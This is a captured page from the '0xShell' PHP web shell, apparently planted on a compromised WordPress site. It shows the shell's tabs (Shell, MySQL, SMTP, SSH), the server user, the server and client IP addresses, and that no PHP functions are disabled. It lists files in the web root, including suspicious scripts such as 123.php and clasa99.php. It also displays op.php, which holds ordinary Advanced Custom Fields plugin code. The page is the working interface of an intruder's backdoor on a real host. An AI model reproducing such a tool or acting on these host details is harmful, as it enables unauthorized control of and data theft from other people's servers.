0xShell Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload file System Info: User: couragent | UID: 1022 | GID: 1024 | Groups: 1024 Server IP: 62.72.47.222 | Client IP: 23.145.24.71 PHP: 8.1.29 | OS: Linux | Server: LiteSpeed command /home/couragent/public_html$ Enter file path to read Files ../ � .htaccess � '0e 4e5 .tmb/ � .user.ini � '0e 4e5 .well-known/ � 123.php � '0e 4e5 cgi-bin/ � clasa99.php � '0e 4e5 error_log � '0e 4e5 evs.txt � '0e 4e5 home/ � index.php � 4e5 license.txt � '0e 4e5 op.php � '0e 4e5 php.ini � '0e 4e5 readme.html � '0e 4e5 robots.txt � '0e 4e5 wp-activate.php � '0e 4e5 wp-admin/ � wp-blog-header.php � '0e 4e5 wp-comments-post.php � '0e 4e5 wp-config-sample.php � '0e 4e5 wp-config.php � '0e 4e5 wp-content/ � wp-cron.php � '0e 4e5 wp-includes/ � wp-links-opml.php � '0e 4e5 wp-load.php � '0e 4e5 wp-login.php � '0e 4e5 wp-mail.php � '0e 4e5 wp-settings.php � '0e 4e5 wp-signup.php � '0e 4e5 wp-trackback.php � '0e 4e5 xmlrpc.php � '0e 4e5 Viewing: op.php
<?php
/*
Plugin Name: Advanced Custom Fields: Repeater Field
Plugin Slug: acf-repeater
Plugin URI: http://www.advancedcustomfields.com/
Description: This premium Add-on adds a repeater field type for the Advanced Custom Fields plugin
Version: 2.1.0
Author: Elliot Condon
Author URI: http://www.elliotcondon.com/
License: GPL
Copyright: Elliot Condon
*/
if( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
if( !class_exists('acf_plugin_repeater') ):
class acf_plugin_repeater {
// vars
var $settings;
/*
* __construct
*
* This function will setup the class functionality
*
* @type function
* @date 5/03/2014
* @since 5.0.0
*
* @param n/a
* @return n/a
*/
function __construct() {
// vars
$this->settings = array(
// basic
'name' => __('Advanced Custom Fields: Repeater Field', 'acf'),
'version' => '2.1.0',
// urls
'slug' => dirname(plugin_basename( __FILE__ )),
'basename' => plugin_basename( __FILE__ ),
'path' => plugin_dir_path( __FILE__ ),
'dir' => plugin_dir_url( __FILE__ ),
);
// include v5 field
add_action('acf/include_field_types', array($this, 'include_field_types'));
// include v4 field
add_action('acf/register_fields', array($this, 'include_field_types'));
// include updates
if( is_admin() ) {
$this->include_file('acf-repeater-update.php');
}
}
/*
* include_file
*
* This function will check if a file exists before including it
*
* @type function
* @date 22/2/17
* @since 5.5.8
*
* @param $file (string)
* @return n/a
*/
function include_file( $file = '' ) {
$file = dirname(__FILE__) . '/'. $file;
if( file_exists($file) ) include_once( $file );
}
/*
* include_field_types
*
* This function will include the v5 field type
*
* @type function
* @date 12/06/2015
* @since 5.2.3
*
* @param n/a
* @return n/a
*/
function include_field_types() {
// vars
$version = '';
// version 5
if( defined('ACF_VERSION') ) {
// version 5.7+
if( version_compare(ACF_VERSION, '5.7.0', '>=') ) {
$version = '5-7';
// version 5.0
} else {
$version = '5-0';
}
// version 4
} else {
$version = '4-0';
}
// include
$this->include_file( "includes/$version/acf-repeater-field.php" );
}
}
// globals
global $acf_plugin_repeater;
// instantiate
$acf_plugin_repeater = new acf_plugin_repeater();
// end class
endif;
?>
Disabled functions: None